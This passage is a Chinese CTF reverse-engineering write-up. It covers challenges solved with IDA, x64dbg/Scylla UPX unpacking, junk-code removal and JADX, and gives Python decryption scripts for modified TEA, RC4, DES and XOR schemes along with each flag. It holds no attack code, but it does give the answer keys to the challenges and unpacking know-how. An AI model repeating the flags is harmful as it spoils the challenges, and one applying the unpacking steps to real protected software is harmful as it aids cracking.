.bss:00007FF6AB7110E1 db 1Fh .bss:00007FF6AB7110E2 db 0DEh .bss:00007FF6AB7110E3 db 57h ; W .bss:00007FF6AB7110E4 db 53h ; S .bss:00007FF6AB7110E5 db 0AEh .bss:00007FF6AB7110E6 db 0 .bss:00007FF6AB7110E7 db 0 .bss:00007FF6AB7110E8 db 0FCh .bss:00007FF6AB7110E9 db 73h ; s .bss:00007FF6AB7110EA db 99h .bss:00007FF6AB7110EB db 49h ; I .bss:00007FF6AB7110EC db 53h ; S .bss:00007FF6AB7110ED db 2Fh ; / .bss:00007FF6AB7110EE db 0 .bss:00007FF6AB7110EF db 0 .bss:00007FF6AB7110F0 db 0A1h .bss:00007FF6AB7110F1 db 0FAh .bss:00007FF6AB7110F2 db 71h ; q .bss:00007FF6AB7110F3 db 0F9h .bss:00007FF6AB7110F4 db 51h ; Q .bss:00007FF6AB7110F5 db 0Bh .bss:00007FF6AB7110F6 db 0 .bss:00007FF6AB7110F7 db 0 .bss:00007FF6AB7110F8 db 3Fh ; ? .bss:00007FF6AB7110F9 db 2Ch ; , .bss:00007FF6AB7110FA db 0F2h .bss:00007FF6AB7110FB db 0D9h .bss:00007FF6AB7110FC db 49h ; I .bss:00007FF6AB7110FD db 9Dh .bss:00007FF6AB7110FE db 0 .bss:00007FF6AB7110FF db 0 .bss:00007FF6AB711100 db 97h .bss:00007FF6AB711101 db 0D5h .bss:00007FF6AB711102 db 0B3h .bss:00007FF6AB711103 db 9Ah .bss:00007FF6AB711104 db 49h ; I .bss:00007FF6AB711105 db 1Fh .bss:00007FF6AB711106 db 0 .bss:00007FF6AB711107 db 0 .bss:00007FF6AB711108 db 0A3h .bss:00007FF6AB711109 db 27h ; ' .bss:00007FF6AB71110A db 8Fh .bss:00007FF6AB71110B db 8Dh .bss:00007FF6AB71110C db 29h ; ) .bss:00007FF6AB71110D db 3Eh ; &gt; .bss:00007FF6AB71110E db 0 .bss:00007FF6AB71110F db 0 .bss:00007FF6AB711110 db 45h ; E .bss:00007FF6AB711111 db 6Bh ; k .bss:00007FF6AB711112 db 0FEh .bss:00007FF6AB711113 db 0Dh .bss:00007FF6AB711114 db 2Ch ; , .bss:00007FF6AB711115 db 1Bh .bss:00007FF6AB711116 db 0 .bss:00007FF6AB711117 db 0 .bss:00007FF6AB711118 db 0DEh .bss:00007FF6AB711119 db 0C3h .bss:00007FF6AB71111A db 72h ; r .bss:00007FF6AB71111B db 0BCh .bss:00007FF6AB71111C db 2Ch ; , .bss:00007FF6AB71111D db 49h ; I .bss:00007FF6AB71111E db 0 .bss:00007FF6AB71111F db 0 .bss:00007FF6AB711120 db 8Bh .bss:00007FF6AB711121 db 0B5h .bss:00007FF6AB711122 db 0D5h .bss:00007FF6AB711123 db 0ACh .bss:00007FF6AB711124 db 0ACh .bss:00007FF6AB711125 db 0D4h .bss:00007FF6AB711126 db 0 .bss:00007FF6AB711127 db 0 .bss:00007FF6AB711128 db 69h ; i .bss:00007FF6AB711129 db 36h ; 6 .bss:00007FF6AB71112A db 0EEh .bss:00007FF6AB71112B db 22h ; " .bss:00007FF6AB71112C db 0AEh .bss:00007FF6AB71112D db 0D2h .bss:00007FF6AB71112E db 0 .bss:00007FF6AB71112F db 0 .bss:00007FF6AB711130 db 6Eh ; n .bss:00007FF6AB711131 db 0FBh .bss:00007FF6AB711132 db 7Ah ; z .bss:00007FF6AB711133 db 26h ; &amp; .bss:00007FF6AB711134 db 0BEh .bss:00007FF6AB711135 db 0E8h .bss:00007FF6AB711136 db 0 .bss:00007FF6AB711137 db 0 .bss:00007FF6AB711138 db 2Fh ; / .bss:00007FF6AB711139 db 0CDh .bss:00007FF6AB71113A db 4Eh ; N .bss:00007FF6AB71113B db 26h ; &amp; .bss:00007FF6AB71113C db 0B6h .bss:00007FF6AB71113D db 0A1h .bss:00007FF6AB71113E db 0 .bss:00007FF6AB71113F db 0 </code></pre> <p>IDApython脚本用于将keys逆序</p> <pre><code># 在 IDA Python 控制台执行(或 adapt 为 x64dbg Python 插件) import ida_bytes, ida_kernwin BASE = 0x00007FF65CA810C0 # ← 你给的 Keys 起始地址 ROUNDS = 16 SLOT = 8 # 每槽 8 字节(前 6 字节是真 key,后 2 字节填充) KEYLEN = 6 # 真正 key 长度 # 读取原始并保存备份文件 (可选) orig = ida_bytes.get_bytes(BASE, ROUNDS*SLOT) open("keys_backup.bin","wb").write(orig) # 抽取每槽前 6 字节 blocks = [ida_bytes.get_bytes(BASE + i*SLOT, KEYLEN) for i in range(ROUNDS)] # 倒序并回写(每槽写 6 字节 + 两字节 0x00 0x00) for i, b in enumerate(reversed(blocks)): ea = BASE + i * SLOT ida_bytes.patch_bytes(ea, b + b'\x00\x00') ida_kernwin.msg("Keys slots reversed (K16..K1) at 0x%X\n" % BASE) </code></pre> <p>逆过来就是</p> <pre><code>0007FF7837B10C0 public Keys .bss:00007FF7837B10C0 ; _QWORD Keys[16] .bss:00007FF7837B10C0 Keys dq 0A1B6264ECD2Fh, 0E8BE267AFB6Eh, 0D2AE22EE3669h, 0D4ACACD5B58Bh, 492CBC72C3DEh .bss:00007FF7837B10C0 ; DATA XREF: sub_7FF7837A1550+12↑o .bss:00007FF7837B10C0 ; sub_7FF7837A1CC0+ED↑o .bss:00007FF7837B10E8 dq 1B2C0DFE6B45h, 3E298D8F27A3h, 1F499AB3D597h, 9D49D9F22C3Fh, 0B51F971FAA1h .bss:00007FF7837B1110 dq 2F53499973FCh, 0AE5357DE1F1Ch, 86D372D3CE2Bh, 0F4D270E9D3F1h, 0E016F68E7DDCh .bss:00007FF7837B1138 dq 0E0B64E34DDBAh </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-087.png" alt="" /></p> <p>flag{Fun_Fact_its_littleEndian_DES}#####</p> <h2>Week 2</h2> <h1>1.Do you like to drink tea?</h1> <p>IDA打开,定位到main函数,魔改的TEA算法,delta值为1640531527,轮数32,我们的输入经过sub_401530函数,然后放在Block里,最后把进过加密的输入与v4数组进行对比</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-088.png" alt="" /></p> <p>sub_401530函数是把我们的输入按4字节划分为小端的dword数组</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-089.png" alt="" /></p> <p>脚本</p> <pre><code>import struct DELTA = 1640531527 ROUNDS = 32 K0 = 305419896 K1 = 2882400001 K2 = 289739801 K3 = 421101825 def u32(x): return x &amp; 0xFFFFFFFF def inv_pair(a1, b1): sum_ = u32(-ROUNDS * DELTA) a = u32(a1) b = u32(b1) for _ in range(ROUNDS): sum_ = u32(sum_ + DELTA) t_b = u32(u32(a &lt;&lt; 6) + K2) ^ u32(sum_ + a + 20) ^ u32((a &gt;&gt; 9) + K3) b = u32(b + t_b) t_a = u32(u32(b &lt;&lt; 6) + K0) ^ u32(sum_ + b + 11) ^ u32((b &gt;&gt; 9) + K1) a = u32(a + t_a) return a, b def dwords_to_bytes(arr): data = b''.join(struct.pack('&lt;I', u32(x)) for x in arr) return data.rstrip(b'\x00') final_u32 = [ (-262322456) &amp; 0xFFFFFFFF, (1199964143) &amp; 0xFFFFFFFF, (-201212030) &amp; 0xFFFFFFFF, (-436419062) &amp; 0xFFFFFFFF, (-1099955107) &amp; 0xFFFFFFFF, (544769843) &amp; 0xFFFFFFFF, (-1824808087) &amp; 0xFFFFFFFF, ] x = final_u32[:] for i in range(len(x) - 2, -1, -1): a0, b0 = inv_pair(x[i], x[i+1]) x[i], x[i+1] = a0, b0 flag_bytes = dwords_to_bytes(x) print(flag_bytes.decode('utf-8', errors='replace')) </code></pre> <p>flag{OH_I_L0VE_D3inK_Te4!!!}</p> <h1>2.rc4</h1> <p>IDA打开,main函数如下,是rc4加密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-090.png" alt="" /></p> <p>具体实现在rc4_init和rc4_crypt这两个函数里,与标准rc4的不同在于最后的结果再异或上k</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-091.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-092.png" alt="" /></p> <pre><code> def rc4_decrypt(key, data): s = list(range(256)); j = 0 for i in range(256): j = (j + s[i] + key[i % len(key)]) &amp; 0xff s[i], s[j] = s[j], s[i] i = j = 0 out = bytearray(data) for k in range(len(out)): i = (i + 1) &amp; 0xff j = (j + s[i]) &amp; 0xff s[i], s[j] = s[j], s[i] out[k] ^= (k &amp; 0xff) ^ s[(s[i] + s[j]) &amp; 0xff] return bytes(out) cipher = ( int.to_bytes(0xD6DB345DC17A5FF7, 8, 'little') + int.to_bytes(0x68DAE1DE2D75D82F, 8, 'little') + int.to_bytes(0xF907EACE4A9B57E0, 8, 'little') ) cipher = bytearray(cipher[:23] + int.to_bytes(1585012473, 4, 'little')) # 总长27 plain = rc4_decrypt(b"ohhhRC4", cipher) print(plain.decode(errors="ignore")) </code></pre> <p>flag{S0NNE_Rc4_l$_c13@nged}</p> <h1>3.base</h1> <p>IDA中打开main,确认是用自定义的Base64字母表编码并校验一段密文</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-093.png" alt="" /></p> <p>我们正确的base64是由正确的加密的base64密文经过base58解密得到</p> <p>密文</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-094.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-095.png" alt="" /></p> <p>解密出正确的base64(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/)</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-096.png" alt="" /></p> <p>解密密文</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-097.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-098.png" alt="" /></p> <p>用我们得到的base64解密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-099.png" alt="" /></p> <p>flag{Tl4is_1o@se}</p> <h1>4.pyc</h1> <p>先用pyinstxtractor.py 解出 pyc.exe_extracted</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-100.png" alt="" /></p> <p>能看到所用版本是3.8,可能的入口点有两个pyiboot01_bootstrap.pyc和pyc.pyc</p> <p>用decompyle3</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-101.png" alt="" /></p> <p>打开pyc.py,文件最下面</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-102.png" alt="" /></p> <p>他会对三种字符分别处理,最后所有字符再hex(ord(c)),然后拼接</p> <pre><code>data_str = "0xba,0xc6,0xb0,0xbc,0x86,0x10b,0x126,0xe4,0x6a,0xc0,0x40,0x6a,0xda,0x3f,0xd2,0xe0,0x6a,0xb8,0x3f,0xd4,0xe0,0x89,0x88" values = [int(x, 16) for x in data_str.split(",")] def invert_char(t: int) -&gt; str: if (t - 6) % 2 == 0: cand = ((t - 6) // 2) + 12 c = chr(cand) if 'a' &lt;= c &lt;= 'z': return c if (t - 9) % 3 == 0: cand = ((t - 9) // 3) - 6 c = chr(cand) if 'A' &lt;= c &lt;= 'Z': return c c = chr(t - 11) return c flag = ''.join(invert_char(t) for t in values) print(flag) def forward_t(c: str) -&gt; int: o = ord(c) if 'a' &lt;= c &lt;= 'z': return (o - 12) * 2 + 6 elif 'A' &lt;= c &lt;= 'Z': return (o + 6) * 3 + 9 else: return o + 11 hex_join = ",".join(hex(forward_t(c)) for c in flag) </code></pre> <p>flag{PYC_i5_v4ry_e4sy~}</p> <h1>5.螺旋密码机</h1> <p>JADX中打开mainactivity,看来存在native层</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-103.png" alt="" /></p> <p>apktool反编译</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-104.png" alt="" /></p> <p>IDA打开so文件,直接定位上面提到的方法</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-105.png" alt="" /></p> <p>题目的基本逻辑是生成一个随机数列,和为31737执行decryptflag函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-106.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-107.png" alt="" /></p> <p>我们直接看decryptflag,重点在a3未知,也就是main中的v6</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-108.png" alt="" /></p> <p>v6把每个字符当 char 相加的总和,传给 decryptFlag 时取低 8 位</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-109.png" alt="" /></p> <ul> <li>自定义序列 fib :</li> <li>长度为 len(password) // 2 + len(password) 。</li> <li>前两项是 ord(password[0]) 和 ord(password[1]) 。</li> <li>之后每一项为前两项之和对 10000 取模。</li> <li>计算中间值:</li> <li>fib_sum = sum(fib)</li> <li>pwd_len = len(password)</li> <li>v5 = fib_sum ^ (17 * pwd_len)</li> <li>ascii_sum = sum(ord(c) for c in password)</li> <li>最终得到:</li> <li>v6 = 7 * (ascii_sum ^ v5) % 65536</li> </ul> <pre><code>def generate_custom_fib_sequence(password): length = len(password) // 2 + len(password) fib = [ord(password[0]), ord(password[1])] for i in range(2, length): fib.append((fib[i-1] + fib[i-2]) % 10000) return fib def calculate_v6(password): fib = generate_custom_fib_sequence(password) fib_sum = sum(fib) v5 = fib_sum ^ (17 * len(password)) ascii_sum = sum(ord(c) for c in password) v6 = 7 * (ascii_sum ^ v5) % 65536 return v6 print(calculate_v6("yourpass")) </code></pre> <p>v6为29354,取余后就是51</p> <p>密文</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-110.png" alt="" /></p> <p>解密脚本</p> <pre><code>data = [0xEE,0xE4,0xE9,0xEF,0xF3,0xCC,0xF1,0xE6,0xBC,0xE5,0xB9,0xEB,0xD7,0xC4,0xB8,0xBC,0xEC,0xBB,0xFA,0xD7,0xC5,0xBC,0xFB,0xFC,0xBB,0xFA,0xF5,0x00] cipher = bytes(data[:data.index(0)]) a3 = 51 a4 = 31737 &amp; 0xFF v7 = a4 ^ a3 ^ 0x42 plain = bytes(b ^ v7 for b in cipher) print(plain.decode('ascii')) </code></pre> <p>flag{Dyn4m1c_L04d3r_M4st3r}</p> <h1>6.upx</h1> <p>这是一道手动脱壳题,这里用x64dbg+scylla</p> <p>x64dbg打开是这样</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-111.png" alt="" /></p> <p>F9运行,找到入口</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-112.png" alt="" /></p> <p>F7单步执行,走完入栈,观察ESP的地址</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-113.png" alt="" /></p> <p>右键该地址,在内存窗口打开</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-114.png" alt="" /></p> <p>然后右键栈顶,设置硬件断点(访问,4字节)</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-115.png" alt="" /></p> <p>设置完之后,F9运行就到了</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-116.png" alt="" /></p> <p>看到jmp大跳,跳过去,找到这个,在跳过去</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-117.png" alt="" /></p> <p>就能看到这个了,能看到让输入flag,这里就是我们要找的</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-118.png" alt="" /></p> <p>打开scylla,附件给程序</p> <p>把地址输入,点IAT Autosearch 之后点Get Imports删除冒红,点击dump</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-119.png" alt="" /></p> <p>之后再对dump出的文件Fix一下</p> <p>IDA打开修改后的,字符串搜索</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-120.png" alt="" /></p> <p>点进去,看到flag加密逻辑,对输入进行主字符变换</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-121.png" alt="" /></p> <p>脚本</p> <pre><code>def invert(mut: str) -&gt; str: out = [] i = 0 for ch in mut: if ch == '}': out.append(ch) break code = ord(ch) if 65 &lt;= code &lt;= 90: # uppercase: inverse of (+ i) out.append(chr(((code - 65 - i + 26) % 26) + 65)) elif 97 &lt;= code &lt;= 122: # lowercase: inverse of (- i) out.append(chr(((code - 97 + i + 26) % 26) + 97)) else: out.append(ch) i += 1 return ''.join(out) mut = "fkyd{YNek_SD_AB@ars_OKT}" orig = invert(mut) print("Flag:", orig) </code></pre> <p>flag{THls_IS_NN@qik_UPX}</p> <h1>7.flowers</h1> <p>去花指令题</p> <p>IDA打开后会看到有两处花指令,以及许多字节序列,按u再按c</p> <p>共有</p> <p>第一处花指令</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-122.png" alt="" /></p> <p>第二处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-123.png" alt="" /></p> <p>第三处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-124.png" alt="" /></p> <p>第四处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-125.png" alt="" /></p> <p>第五处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-126.png" alt="" /></p> <p>第六处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-127.png" alt="" /></p> <p>第七处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-128.png" alt="" /></p> <p>第八处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-129.png" alt="" /></p> <p>第九处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-130.png" alt="" /></p> <p>第十处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-131.png" alt="" /></p> <p>第十一处和第十二处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-132.png" alt="" /></p> <p>去完花指令,F5,main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-133.png" alt="" /></p> <p>enc函数,变种的TEA,delta值为1131796</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-134.png" alt="" /></p> <p>key和目标数组</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-135.png" alt="" /></p> <p>脚本</p> <pre><code>import struct def dec(block, key): v5, v4 = block v6 = 1131796 * 32 for i in range(32): v4 = (v4 - ((v5 + v6) ^ (16*v5 + key[2]) ^ ((v5 &gt;&gt; 5) + key[3]))) &amp; 0xFFFFFFFF v6 = (v6 - 1131796) &amp; 0xFFFFFFFF v5 = (v5 - ((v4 + v6) ^ (16*v4 + key[0]) ^ ((v4 &gt;&gt; 5) + key[1]))) &amp; 0xFFFFFFFF return v5, v4 key = [0x01234567, 0x89ABCDEF, 0x0FEDCBA98, 0x76543210] ans_hex = ( "A5 15 A2 47 31 1C 8F DB" " 13 BF 6A 91 2F 12 25 DE" " 49 26 F5 66 55 0E 9B 4E" " DF 19 52 3D 88 63 B6 CF" " DF 19 52 3D 88 63 B6 CF" " DF 19 52 3D 88 63 B6 CF" " 00 00 00 00 00 00 00 00" " 00 00 00 00 00 00 00 00" " 00 00 00 00 00 00 00 00" " 00 00 00 00 00 00 00 00" " 00 00 00 00 00 00 00 00" " 00 00 00 00 00 00 00 00" ) ans_bytes = bytes([int(b, 16) for b in ans_hex.split()]) flag_bytes = b"" for i in range(0, 48, 8): block = struct.unpack("&lt;II", ans_bytes[i:i+8]) dec_block = dec(block, key) flag_bytes += struct.pack("&lt;II", *dec_block) print(flag_bytes) print(flag_bytes.rstrip(b"#").decode(errors="ignore")) </code></pre> <p>flag{aCupOf_FlowerTea} (#不影响)</p> <h1>8.CPPReverse</h1> <p>IDA中打开main函数,开头会做检验,长度要大于等于6</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-136.png" alt="" /></p> <p>sub_1400017B0取子串</p> <p>sub_140003320调用sub_140003380,然后sub_140003380在调用sub_140001620两位一组取值来实现HEX→字节转换</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-137.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-138.png" alt="" /></p> <p>sub_140003530对每个字节执行顺序相关的三步变换:</p> <ul> <li>加法: b[i] = (b[i] + i + 7) mod 256</li> <li>依赖前一位的异或: if i &gt; 0: b[i] ^= (b[i-1] - 1) (注意这里的 b[i-1] 是已经完成此前全部变换后的值)</li> <li>偶数位再异或: if i % 2 == 0: b[i] ^= 0x07</li> </ul> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-139.png" alt="" /></p> <p>通过sub_140003450函数再将字节转为16进制串</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-140.png" alt="" /></p> <p>最后比较</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-141.png" alt="" /></p> <p>对unk_14000A768交叉引用</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-142.png" alt="" /></p> <p>打开sub_140001000函数,看到密文</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-143.png" alt="" /></p> <p>解题脚本</p> <pre><code>def transform(C: str) -&gt; str: T = ''.join(reversed(C)) p = [int(T[i:i+2], 16) for i in range(0, len(T), 2)] x = [] for i, val in enumerate(p): tmp = val if i % 2 == 0: tmp ^= 7 if i &gt; 0: prev = p[i - 1] tmp ^= ((prev - 1) &amp; 0xFF) orig = tmp - (i + 7) if orig &lt; 0: orig += 256 x.append(orig % 256) Srev = ''.join(f'{b:02X}' for b in x) S = ''.join(reversed(Srev)) return S def main(): C = 'EE1A9B5AFA59AF28DE5D594F8FB990B1D1345590' S = transform(C) print(f'flag{{{S}}}') if __name__ == '__main__': main() </code></pre> <p>flag{4350505F526576657253655F4578705F55705570}</p> <h2>Week 1</h2> <h1>1.8086ASM</h1> <p>用010打开</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-144.png" alt="" /></p> <p>完整汇编</p> <pre><code>.MODEL SMALL .STACK 100H .DATA WELCOME_MSG db 'Welcome to 8086ASM.', 0DH, 0AH, '$' INPUT_MSG db 'Input your flag:', '$' WRONG_MSG db 0DH, 0AH, 'Wrong.', 0DH, 0AH, '$' CORRECT_MSG db 0DH, 0AH, 'Correct.', 0DH, 0AH, '$' DATA1 DB 0BBH, 01BH, 083H, 08CH, 036H, 019H, 0CCH, 097H DB 08DH, 0E4H, 097H, 0CCH, 00CH, 048H, 0E4H, 01BH DB 00EH, 0D7H, 05BH, 065H, 01BH, 050H, 096H, 006H DB 03FH, 019H, 00CH, 04FH, 04EH, 0F9H, 01BH, 0D7H DB 0CH, 01DH, 0A0H, 0C6H DATA2 DW 01122H, 03344H, 01717H, 09090H, 0BBCCH INPUT_BUFFER db 37 dup(0) BUFFER db 37 dup(0) .CODE START: MOV AX, @DATA MOV DS, AX MOV AH, 09H MOV DX, OFFSET WELCOME_MSG INT 21H MOV DX, OFFSET INPUT_MSG INT 21H MOV AH,0AH MOV DX, OFFSET INPUT_BUFFER MOV BYTE PTR[INPUT_BUFFER], 37 INT 21H CALL ENCRYPT MOV DI, OFFSET DATA1 MOV SI, OFFSET INPUT_BUFFER + 2 MOV CX, 35 LOOP1: MOV AX, [DI] CMP AX, [SI] JNE WRONG_EXIT INC DI INC SI LOOP LOOP1 JMP CORRECT_EXIT WRONG_EXIT: MOV AH,09H LEA DX,WRONG_MSG INT 21H JMP EXIT CORRECT_EXIT: MOV AH,09H LEA DX,CORRECT_MSG INT 21H JMP EXIT EXIT: MOV AX, 4C00H INT 21H ENCRYPT PROC PUSH AX PUSH BX PUSH CX MOV SI, OFFSET INPUT_BUFFER + 2 MOV BX, OFFSET DATA2 MOV CX, 35 LOOP2: PUSH CX MOV CL, 2 MOV AL, [SI] ROR AL, CL POP CX MOV [SI], AL MOV AX, WORD PTR[SI] XOR AX, WORD PTR[BX] MOV WORD PTR[SI], AX INC SI ADD BX, 2 CMP BX, OFFSET DATA2 + 10 JNE CASE1 MOV BX, OFFSET DATA2 CASE1: LOOP LOOP2 POP CX POP BX POP AX RET ENCRYPT ENDP END START </code></pre> <p>密文密钥</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-145.png" alt="" /></p> <p>脚本</p> <pre><code> DATA1 = [0xBB,0x1B,0x83,0x8C,0x36,0x19,0xCC,0x97,0x8D,0xE4,0x97,0xCC,0x0C,0x48,0xE4,0x1B, 0x0E,0xD7,0x5B,0x65,0x1B,0x50,0x96,0x06,0x3F,0x19,0x0C,0x4F,0x4E,0xF9,0x1B,0xD7, 0x0C,0x1D,0xA0,0xC6] keys = [0x1122,0x3344,0x1717,0x9090,0xBBCC] klo = [k &amp; 0xFF for k in keys] khi = [(k &gt;&gt; 8) &amp; 0xFF for k in keys] rol2 = lambda x: ((x&lt;&lt;2)&amp;0xFF) | (x&gt;&gt;6) S = DATA1[:] P = [0]*36 for i in range(34, -1, -1): j = i % 5 V = rol2(S[i] ^ klo[j]) P[i] = V ^ (khi[(i-1)%5] if i&gt;0 else 0) S[i] = V S[i+1] = S[i+1] ^ khi[j] P[35] = S[35] print(bytes(P)) </code></pre> <p>flag{W31c0m3_t0_8086_A5M_W0RlD___!!}</p> <h1>2.ezCSharp</h1> <p>用dnspy打开,找到这个打开,看到入口点在Program.Main</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-146.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-147.png" alt="" /></p> <p>在左侧边栏打开</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-148.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-149.png" alt="" /></p> <p>最主要的在这,打开</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-150.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-151.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-152.png" alt="" /></p> <p>现在我们就按照加密逻辑中方式对该字符串进行操作</p> <pre><code>def decode_flag(encoded: str) -&gt; str: out = [] for c in encoded: if c == '!': out.append('_') elif 'a' &lt;= c &lt;= 'z': out.append('z' if c == 'a' else chr(ord(c) - 1)) else: out.append(c) return ''.join(out) if __name__ == "__main__": enc = "D1ucj0u!tqjwf!fohjoffsjoh!xj!epspqz!ju!gvo!2025" dec = decode_flag(enc) print("Decoded:", dec) if not dec.startswith("flag{"): print("Flag form: flag{" + dec + "}") </code></pre> <p>flag{D1tbi0t_spive_engineering_wi_doropy_it_fun_2025}</p> <h1>3.ezcalculate</h1> <p>IDA打开,定位带main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-153.png" alt="" /></p> <p>关键加密在这,key的长度是21</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-154.png" alt="" /></p> <p>对输入 <code>Str</code> 做三步逐字节处理(按 <code>key</code> 循环取字节):</p> <ol> <li><code>t1 = s + k</code></li> <li><code>t2 = t1 ^ k</code></li> <li><code>out = t2 - k</code></li> </ol> <p>最后的结果在于answer中字节做对比(取前21字节)</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-155.png" alt="" /></p> <p>脚本</p> <pre><code>key = b"wwqessgxsddkaao123wms" answer = bytes([ 0x33, 0x1d, 0x32, 0x44, 0x2a, 0x54, 0x45, 0x2c, 0x2e, 0x74, 0x8c, 0x4b, 0x40, 0x42, 0x43, 0x73, 0x71, 0x82, 0x24, 0x35, 0x10, ]) def decrypt(ans, key): n, m = len(ans), len(key) s = bytearray(n) for i in range(n): k = key[i % m] t2 = (ans[i] + k) &amp; 0xFF t1 = t2 ^ k s[i] = (t1 - k) &amp; 0xFF return bytes(s) print(decrypt(answer, key).decode('latin1')) </code></pre> <p>flag{Add_X0r_and_Sub}</p> <h1>4.jvav_release</h1> <p>JADX中看到mainactivity</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-156.png" alt="" /></p> <p>看到这里,说明主函数是从MainActivity.kt中反编译出来的</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-157.png" alt="" /></p> <p>查看MainActivity.kt,在最下面,看到调用了 com.utilis.enc.EncKt.checker(String)</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-158.png" alt="" /></p> <p>接着去查看,找到真正加密逻辑</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-159.png" alt="" /></p> <p>脚本</p> <pre><code>import base64 signed=[-89, 96, 102, 118, -89, -122, 103, -103, -125, -95, 114, 117, -116, -102, 114, -115, -125, 108, 110, 118, -91, -83, 101, -115, -116, -114, 124, 114, -123, -87, -87, -114, 121, 108, 124, -114] 